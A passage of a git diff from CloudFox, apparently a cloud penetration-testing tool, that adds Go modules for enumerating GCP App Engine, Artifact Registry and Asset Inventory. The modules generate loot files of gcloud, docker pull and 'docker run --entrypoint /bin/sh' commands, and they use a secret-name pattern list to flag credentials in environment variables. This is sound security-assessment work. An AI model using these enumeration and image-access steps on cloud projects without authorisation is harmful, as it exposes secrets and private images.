fmt.Sprintf("Could not enumerate App Engine firewall rules in project %s", projectID)) + return + } + + for _, rule := range rules.IngressRules { + fwRule := AppEngineFirewallRule{ + ProjectID: projectID, + Priority: rule.Priority, + Action: rule.Action, + SourceRange: rule.SourceRange, + Description: rule.Description, + } + + m.mu.Lock() + 
m.FirewallRules = append(m.FirewallRules, fwRule) + m.mu.Unlock() + } + + m.mu.Lock() + for i := range m.Apps { + if m.Apps[i].ProjectID == projectID { + m.Apps[i].FirewallRules = len(rules.IngressRules) + break + } + } + m.mu.Unlock() +} + +func (m *AppEngineModule) analyzeEnvVars(envVars map[string]string, serviceID, versionID, projectID string) int { + secretPatterns := []string{ + "PASSWORD", "SECRET", "API_KEY", "TOKEN", "PRIVATE_KEY", + "DATABASE_URL", "DB_PASSWORD", "MYSQL_PASSWORD", "POSTGRES_PASSWORD", + "MONGODB_URI", "AWS_SECRET", "ENCRYPTION_KEY", "JWT_SECRET", "SESSION_SECRET", + } + + secretCount := 0 + + for name := range envVars { + nameUpper := strings.ToUpper(name) + for _, pattern := range secretPatterns { + if strings.Contains(nameUpper, pattern) { + secretCount++ + m.mu.Lock() + m.secretsFound++ + + m.LootMap["appengine-commands"].Contents += fmt.Sprintf( + "# Potential secret in env var: %s (service: %s, version: %s)\n"+ + "# Recommendation: Migrate to Secret Manager\n"+ + "gcloud app versions describe %s --service=%s --project=%s\n\n", + name, serviceID, versionID, + versionID, serviceID, projectID, + ) + m.mu.Unlock() + break + } + } + } + + return secretCount +} + +func (m *AppEngineModule) isDeprecatedRuntime(runtime string) bool { + deprecatedRuntimes := []string{ + "python27", "go111", "go112", "go113", "java8", "java11", + "nodejs10", "nodejs12", "php55", "php72", "ruby25", + } + + for _, deprecated := range deprecatedRuntimes { + if runtime == deprecated { + return true + } + } + return false +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *AppEngineModule) initializeLootFiles() { + m.LootMap["appengine-commands"] = &internal.LootFile{ + Name: "appengine-commands", + Contents: "# App Engine Commands\n" + + "# Generated by CloudFox\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *AppEngineModule) 
writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Unified table with all columns + header := []string{ + "Project ID", + "Project Name", + "App ID", + "Location", + "Status", + "Hostname", + "Service", + "Version", + "Runtime", + "Environment", + "Ingress", + "Public", + "Service Account", + "Default SA", + "Deprecated", + "Env Vars", + "Secrets", + "VPC Connector", + "URL", + } + + var body [][]string + + if len(m.Versions) > 0 { + // We have versions - show full details for each version + for _, ver := range m.Versions { + // Find the corresponding app for this version + var app AppEngineApp + for _, a := range m.Apps { + if a.ProjectID == ver.ProjectID { + app = a + break + } + } + + publicStr := "No" + if ver.Public { + publicStr = "Yes" + } + + defaultSAStr := "No" + if ver.DefaultSA { + defaultSAStr = "Yes" + } + + deprecatedStr := "No" + if ver.DeprecatedRuntime { + deprecatedStr = "Yes" + } + + body = append(body, []string{ + ver.ProjectID, + m.GetProjectName(ver.ProjectID), + app.ID, + app.LocationID, + app.ServingStatus, + app.DefaultHostname, + ver.ServiceID, + ver.ID, + ver.Runtime, + ver.Environment, + ver.IngressSettings, + publicStr, + ver.ServiceAccount, + defaultSAStr, + deprecatedStr, + fmt.Sprintf("%d", ver.EnvVarCount), + fmt.Sprintf("%d", ver.SecretEnvVars), + ver.VPCConnector, + ver.URL, + }) + + // Add to loot + if ver.Public { + m.LootMap["appengine-commands"].Contents += fmt.Sprintf( + "# Public App Engine service: %s/%s\n"+ + "curl %s\n\n", + ver.ServiceID, ver.ID, ver.URL, + ) + } + } + } else { + // No versions - show app info with "No services deployed" for version columns + for _, app := range m.Apps { + body = append(body, []string{ + app.ProjectID, + m.GetProjectName(app.ProjectID), + app.ID, + app.LocationID, + app.ServingStatus, + app.DefaultHostname, + "No services deployed", + "", + "", + "", + "", + "", + app.ServiceAccount, + "", + "", + "", + "", + "", + "", + }) + } + } + + 
tables = append(tables, internal.TableFile{ + Name: "appengine", + Header: header, + Body: body, + }) + + // Firewall rules table + if len(m.FirewallRules) > 0 { + var fwBody [][]string + for _, rule := range m.FirewallRules { + fwBody = append(fwBody, []string{ + rule.ProjectID, + m.GetProjectName(rule.ProjectID), + fmt.Sprintf("%d", rule.Priority), + rule.Action, + rule.SourceRange, + rule.Description, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "appengine-firewall", + Header: []string{ + "Project ID", + "Project Name", + "Priority", + "Action", + "Source Range", + "Description", + }, + Body: fwBody, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := AppEngineOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_APPENGINE_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/artifact-registry.go b/gcp/commands/artifact-registry.go index 3214fc43..ed393abd 100644 --- a/gcp/commands/artifact-registry.go +++ b/gcp/commands/artifact-registry.go @@ -1,10 +1,14 @@ package commands import ( + "context" "fmt" + "strings" + "sync" artifactregistry "cloud.google.com/go/artifactregistry/apiv1" ArtifactRegistryService "github.com/BishopFox/cloudfox/gcp/services/artifactRegistryService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" 
"github.com/spf13/cobra" @@ -12,161 +16,429 @@ import ( var GCPArtifactRegistryCommand = &cobra.Command{ Use: globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP artifact registry information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available artifact registry resource information: -cloudfox gcp artfact-registry`, + Aliases: []string{"ar", "artifacts", "gcr"}, + Short: "Enumerate GCP Artifact Registry and Container Registry with security configuration", + Long: `Enumerate GCP Artifact Registry and legacy Container Registry (gcr.io) with security-relevant details. + +Features: +- Lists all Artifact Registry repositories with security configuration +- Shows Docker images and package artifacts with tags and digests +- Enumerates IAM policies per repository and identifies public repositories +- Shows encryption type (Google-managed vs CMEK) +- Shows repository mode (standard, virtual, remote) +- Generates gcloud commands for artifact enumeration +- Generates exploitation commands for artifact access +- Enumerates legacy Container Registry (gcr.io) locations + +Security Columns: +- Public: Whether the repository has allUsers or allAuthenticatedUsers access +- Encryption: "Google-managed" or "CMEK" (customer-managed keys) +- Mode: STANDARD_REPOSITORY, VIRTUAL_REPOSITORY, or REMOTE_REPOSITORY +- RegistryType: "artifact-registry" or "container-registry" (legacy gcr.io)`, Run: runGCPArtifactRegistryCommand, } -// Code needed to output fields from buckets results using generic HandleOutput function +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type ArtifactRegistryModule struct { + gcpinternal.BaseGCPModule -// Results struct that implements the internal.OutputInterface -type GCPArtifactRegistryResults struct { - ArtifactData []ArtifactRegistryService.ArtifactInfo - RepositoryData []ArtifactRegistryService.RepositoryInfo + // Module-specific fields + 
Artifacts []ArtifactRegistryService.ArtifactInfo + Repositories []ArtifactRegistryService.RepositoryInfo + LootMap map[string]*internal.LootFile + client *artifactregistry.Client + mu sync.Mutex } -// Decide what format the name, header and body of the CSV & JSON files will be -func (g GCPArtifactRegistryResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type ArtifactRegistryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} - repoHeader := []string{ - "Name", - "Format", - "Description", - "Size", - "Location", - "ProjectID", +func (o ArtifactRegistryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ArtifactRegistryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPArtifactRegistryCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + if err != nil { + return // Error already logged } - var repoBody [][]string + // Create Artifact Registry client + client, err := artifactregistry.NewClient(cmdCtx.Ctx) + if err != nil { + cmdCtx.Logger.ErrorM(fmt.Sprintf("Failed to create Artifact Registry client: %v", err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + return + } + defer client.Close() - for _, value := range g.RepositoryData { - repoBody = append( - repoBody, - []string{ - value.Name, - value.Format, - value.Description, - value.SizeBytes, - value.Location, - value.ProjectID, - }, - ) + // Create module instance + module := &ArtifactRegistryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Artifacts: []ArtifactRegistryService.ArtifactInfo{}, + Repositories: []ArtifactRegistryService.RepositoryInfo{}, + LootMap: 
make(map[string]*internal.LootFile), + client: client, } - repoTableFile := internal.TableFile{ - Header: repoHeader, - Body: repoBody, - Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ArtifactRegistryModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, m.processProject) + + // Check results + if len(m.Repositories) == 0 && len(m.Artifacts) == 0 { + logger.InfoM("No artifact registries found", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + return } - tableFiles = append(tableFiles, repoTableFile) + logger.SuccessM(fmt.Sprintf("Found %d repository(ies) with %d artifact(s)", len(m.Repositories), len(m.Artifacts)), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - artifactHeader := []string{ - "Name", - "Format", - "Version", - "Location", - "Repository", - "Size", - "Updated", - "ProjectID", + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *ArtifactRegistryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating artifact registries in project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) } - var artifactBody [][]string + // Create service and fetch data + ars := ArtifactRegistryService.New(m.client) + result, err := ars.RepositoriesAndArtifacts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, + 
fmt.Sprintf("Could not enumerate artifact registries in project %s", projectID)) + return + } - for _, value := range g.ArtifactData { - artifactBody = append( - artifactBody, - []string{ - value.Name, - value.Format, - value.Version, - value.Location, - value.Repository, - value.SizeBytes, - value.Updated, - value.ProjectID, - }, - ) + // Thread-safe append + m.mu.Lock() + m.Repositories = append(m.Repositories, result.Repositories...) + m.Artifacts = append(m.Artifacts, result.Artifacts...) + + // Generate loot for each repository and artifact + for _, repo := range result.Repositories { + m.addRepositoryToLoot(repo) + } + for _, artifact := range result.Artifacts { + m.addArtifactToLoot(artifact) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d repository(ies) and %d artifact(s) in project %s", len(result.Repositories), len(result.Artifacts), projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ArtifactRegistryModule) initializeLootFiles() { + m.LootMap["artifact-registry-commands"] = &internal.LootFile{ + Name: "artifact-registry-commands", + Contents: "# GCP Artifact Registry Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *ArtifactRegistryModule) addRepositoryToLoot(repo ArtifactRegistryService.RepositoryInfo) { + // Extract repo name from full path + repoName := repo.Name + parts := strings.Split(repo.Name, "/") + if len(parts) > 0 { + repoName = parts[len(parts)-1] } - artifactTableFile := internal.TableFile{ - Header: artifactHeader, - Body: artifactBody, - Name: fmt.Sprintf("%s-artifacts", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + // Handle legacy Container Registry differently + if repo.RegistryType == "container-registry" { + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "## Legacy 
Container Registry: %s (Project: %s)\n"+ + "# Note: Consider migrating to Artifact Registry\n"+ + "# Configure Docker authentication:\n"+ + "gcloud auth configure-docker %s\n"+ + "# List images:\n"+ + "gcloud container images list --repository=%s/%s\n"+ + "# Check for public access (via storage bucket):\n"+ + "gsutil iam get gs://artifacts.%s.appspot.com\n\n", + repo.Name, repo.ProjectID, + strings.Split(repo.Name, "/")[0], // gcr.io hostname + strings.Split(repo.Name, "/")[0], repo.ProjectID, + repo.ProjectID, + ) + return } - tableFiles = append(tableFiles, artifactTableFile) + // Repository header and enumeration commands + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "## Repository: %s (Project: %s, Location: %s)\n"+ + "# Format: %s, Mode: %s, Encryption: %s, Public: %s\n"+ + "# Describe repository:\n"+ + "gcloud artifacts repositories describe %s --project=%s --location=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud artifacts repositories get-iam-policy %s --project=%s --location=%s\n", + repoName, repo.ProjectID, repo.Location, + repo.Format, repo.Mode, repo.EncryptionType, repo.PublicAccess, + repoName, repo.ProjectID, repo.Location, + repoName, repo.ProjectID, repo.Location, + ) + + // Docker-specific commands + if repo.Format == "DOCKER" { + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "# Configure Docker authentication:\n"+ + "gcloud auth configure-docker %s-docker.pkg.dev\n"+ + "# List images:\n"+ + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s\n"+ + "# List vulnerabilities:\n"+ + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s --show-occurrences --occurrence-filter=\"kind=VULNERABILITY\"\n", + repo.Location, + repo.Location, repo.ProjectID, repoName, + repo.Location, repo.ProjectID, repoName, + ) + } - return tableFiles + m.LootMap["artifact-registry-commands"].Contents += "\n" } -// Decide what is loot based on resource information -func (g GCPArtifactRegistryResults) LootFiles() 
[]internal.LootFile { - // TODO consider a loot file of the URLs to the all docker image artifacts. Maybe sample commands to pull the images - return []internal.LootFile{} +func (m *ArtifactRegistryModule) addArtifactToLoot(artifact ArtifactRegistryService.ArtifactInfo) { + // Exploitation commands for Docker images + if artifact.Format == "DOCKER" { + imageBase := fmt.Sprintf("%s-docker.pkg.dev/%s/%s/%s", + artifact.Location, artifact.ProjectID, artifact.Repository, artifact.Name) + + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "## Docker Image: %s (Project: %s)\n"+ + "# Repository: %s, Location: %s\n"+ + "# Digest: %s\n", + artifact.Name, artifact.ProjectID, + artifact.Repository, artifact.Location, + artifact.Digest, + ) + + // Generate commands for each tag + if len(artifact.Tags) > 0 { + for _, tag := range artifact.Tags { + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "# Tag: %s\n"+ + "docker pull %s:%s\n"+ + "docker inspect %s:%s\n"+ + "docker run -it --entrypoint /bin/sh %s:%s\n\n", + tag, + imageBase, tag, + imageBase, tag, + imageBase, tag, + ) + } + } else { + // No tags, use digest + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "# No tags - use digest\n"+ + "docker pull %s@%s\n"+ + "docker inspect %s@%s\n"+ + "docker run -it --entrypoint /bin/sh %s@%s\n\n", + imageBase, artifact.Digest, + imageBase, artifact.Digest, + imageBase, artifact.Digest, + ) + } + } } -// Houses high-level logic that retrieves resources and writes to output -func runGCPArtifactRegistryCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs from parent (gcp command) ctx - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", 
globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Repository table with IAM columns (one row per IAM member) + repoHeader := []string{ + "Project ID", + "Project Name", + "Name", + "Format", + "Location", + "Mode", + "Public", + "Encryption", + "Role", + "Member Type", + "Member", } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + var repoBody [][]string + publicCount := 0 + for _, repo := range m.Repositories { + // Extract repo name from full path + repoName := repo.Name + parts := strings.Split(repo.Name, "/") + if len(parts) > 0 { + repoName = parts[len(parts)-1] + } + + // Format public access display + publicDisplay := "" + if repo.IsPublic { + publicDisplay = repo.PublicAccess + publicCount++ + } + + // Shorten mode for display + mode := repo.Mode + mode = strings.TrimPrefix(mode, "REPOSITORY_MODE_") + mode = strings.TrimSuffix(mode, "_REPOSITORY") + + // One row per IAM member + if len(repo.IAMBindings) > 0 { + for _, binding := range repo.IAMBindings { + for _, member := range binding.Members { + memberType := ArtifactRegistryService.GetMemberType(member) + repoBody = append(repoBody, []string{ + repo.ProjectID, + m.GetProjectName(repo.ProjectID), + repoName, + repo.Format, + repo.Location, + mode, + publicDisplay, + repo.EncryptionType, + binding.Role, + memberType, + member, + }) + } + } + } else { + // Repository with no IAM bindings + repoBody = append(repoBody, []string{ + repo.ProjectID, + m.GetProjectName(repo.ProjectID), + repoName, + repo.Format, + repo.Location, + mode, + publicDisplay, + repo.EncryptionType, + "-", + "-", + "-", + }) + } } - client, err := artifactregistry.NewClient(ctx) - if err != nil { - 
logger.ErrorM(fmt.Sprintf("failed to create secret manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) - return + // Artifact table + artifactHeader := []string{ + "Project ID", + "Project Name", + "Name", + "Repository", + "Location", + "Tags", + "Digest", + "Size", + "Uploaded", } - defer client.Close() - // Get the artifact repositories and artifacts using the projectIDs and ArtifactRegistryService - ars := ArtifactRegistryService.New(client) - var artifactResults []ArtifactRegistryService.ArtifactInfo - var repoRestuls []ArtifactRegistryService.RepositoryInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all artifact repositories and supported artifacts in all locations from project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - result, err := ars.RepositoriesAndArtifacts(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - return + var artifactBody [][]string + for _, artifact := range m.Artifacts { + // Format tags + tags := "-" + if len(artifact.Tags) > 0 { + if len(artifact.Tags) <= 3 { + tags = strings.Join(artifact.Tags, ", ") + } else { + tags = fmt.Sprintf("%s (+%d more)", strings.Join(artifact.Tags[:3], ", "), len(artifact.Tags)-3) + } } - artifactResults = append(artifactResults, result.Artifacts...) - repoRestuls = append(repoRestuls, result.Repositories...) 
- logger.InfoM(fmt.Sprintf("Done retrieving artifact repository resource data from project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - cloudfoxOutput := GCPArtifactRegistryResults{ArtifactData: artifactResults, RepositoryData: repoRestuls} + digest := artifact.Digest - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - return + artifactBody = append(artifactBody, []string{ + artifact.ProjectID, + m.GetProjectName(artifact.ProjectID), + artifact.Name, + artifact.Repository, + artifact.Location, + tags, + digest, + artifact.SizeBytes, + artifact.Uploaded, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: repoHeader, + Body: repoBody, + }, + } + + // Add artifacts table if there are any + if len(artifactBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: fmt.Sprintf("%s-artifacts", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: artifactHeader, + Body: artifactBody, + }) + } + + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible repository(ies)!", publicCount), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } + + output := ArtifactRegistryOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, 
len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/assetinventory.go b/gcp/commands/assetinventory.go new file mode 100644 index 00000000..937f0348 --- /dev/null +++ b/gcp/commands/assetinventory.go @@ -0,0 +1,693 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + asset "cloud.google.com/go/asset/apiv1" + "cloud.google.com/go/asset/apiv1/assetpb" + assetservice "github.com/BishopFox/cloudfox/gcp/services/assetService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + "google.golang.org/api/iterator" +) + +var ( + assetTypes []string + showCounts bool + checkIAM bool + showDependencies bool + showAll bool +) + +var GCPAssetInventoryCommand = &cobra.Command{ + Use: globals.GCP_ASSET_INVENTORY_MODULE_NAME, + Aliases: []string{"assets", "inventory", "cai", "resource-graph"}, + Short: "Enumerate Cloud Asset Inventory with optional dependency analysis", + Long: `Enumerate resources using Cloud Asset Inventory API. + +Features: +- Lists all assets in a project +- Provides asset counts by type +- Can check IAM policies for public access +- Supports filtering by asset type +- Analyzes resource dependencies and cross-project relationships +- Generates query templates for common security use cases + +Flags can be combined to run multiple analyses in a single run. 
+ +Examples: + cloudfox gcp asset-inventory -p my-project + cloudfox gcp asset-inventory -p my-project --counts + cloudfox gcp asset-inventory -p my-project --iam + cloudfox gcp asset-inventory -p my-project --dependencies + cloudfox gcp asset-inventory -p my-project --counts --iam --dependencies + cloudfox gcp asset-inventory -p my-project --all + cloudfox gcp asset-inventory -p my-project --types compute.googleapis.com/Instance,storage.googleapis.com/Bucket`, + Run: runGCPAssetInventoryCommand, +} + +func init() { + GCPAssetInventoryCommand.Flags().StringSliceVar(&assetTypes, "types", []string{}, "Filter by asset types (comma-separated)") + GCPAssetInventoryCommand.Flags().BoolVar(&showCounts, "counts", false, "Show asset counts by type") + GCPAssetInventoryCommand.Flags().BoolVar(&checkIAM, "iam", false, "Check IAM policies for public access") + GCPAssetInventoryCommand.Flags().BoolVar(&showDependencies, "dependencies", false, "Analyze resource dependencies and cross-project relationships") + GCPAssetInventoryCommand.Flags().BoolVar(&showAll, "all", false, "Run all analyses (counts, IAM, dependencies)") +} + +// ResourceDependency represents a dependency between two resources +type ResourceDependency struct { + SourceResource string + SourceType string + TargetResource string + TargetType string + DependencyType string // uses, references, contains + ProjectID string +} + +// CrossProjectResource represents a resource accessed from multiple projects +type CrossProjectResource struct { + ResourceName string + ResourceType string + OwnerProject string + AccessedFrom []string +} + +type AssetInventoryModule struct { + gcpinternal.BaseGCPModule + Assets []assetservice.AssetInfo + TypeCounts []assetservice.AssetTypeCount + Dependencies []ResourceDependency + CrossProject []CrossProjectResource + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type AssetInventoryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o 
AssetInventoryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o AssetInventoryOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPAssetInventoryCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ASSET_INVENTORY_MODULE_NAME) + if err != nil { + return + } + + module := &AssetInventoryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Assets: []assetservice.AssetInfo{}, + TypeCounts: []assetservice.AssetTypeCount{}, + Dependencies: []ResourceDependency{}, + CrossProject: []CrossProjectResource{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *AssetInventoryModule) Execute(ctx context.Context, logger internal.Logger) { + // If --all is set, enable all flags + if showAll { + showCounts = true + checkIAM = true + showDependencies = true + } + + // If no flags set, default to basic asset listing + noFlagsSet := !showCounts && !checkIAM && !showDependencies + + // Run requested analyses + if showCounts { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProjectCounts) + } + + if checkIAM { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProjectIAM) + } else if noFlagsSet { + // Only run basic listing if no flags and IAM not requested (IAM includes basic info) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProject) + } + + if showDependencies { + m.processProjectsDependencies(ctx, logger) + } + + // Build summary message + var summaryParts []string + + if len(m.TypeCounts) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d asset type(s)", len(m.TypeCounts))) + } + + if len(m.Assets) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d asset(s)", len(m.Assets))) + } + + if checkIAM { + 
publicCount := 0 + for _, asset := range m.Assets { + if asset.PublicAccess { + publicCount++ + } + } + if publicCount > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d with public access", publicCount)) + } + } + + if len(m.Dependencies) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d dependencies", len(m.Dependencies))) + } + + if len(m.CrossProject) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d cross-project resources", len(m.CrossProject))) + } + + if len(summaryParts) == 0 { + logger.InfoM("No assets found", globals.GCP_ASSET_INVENTORY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %s", strings.Join(summaryParts, ", ")), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *AssetInventoryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating assets in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + svc := assetservice.New() + assets, err := svc.ListAssets(projectID, assetTypes) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets in project %s", projectID)) + return + } + + m.mu.Lock() + m.Assets = append(m.Assets, assets...) 
+ for _, asset := range assets { + m.addToLoot(asset) + } + m.mu.Unlock() +} + +func (m *AssetInventoryModule) processProjectIAM(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating assets with IAM in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + svc := assetservice.New() + assets, err := svc.ListAssetsWithIAM(projectID, assetTypes) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets with IAM in project %s", projectID)) + return + } + + m.mu.Lock() + m.Assets = append(m.Assets, assets...) + for _, asset := range assets { + m.addToLoot(asset) + } + m.mu.Unlock() +} + +func (m *AssetInventoryModule) processProjectCounts(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Counting assets in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + svc := assetservice.New() + counts, err := svc.GetAssetTypeCounts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, 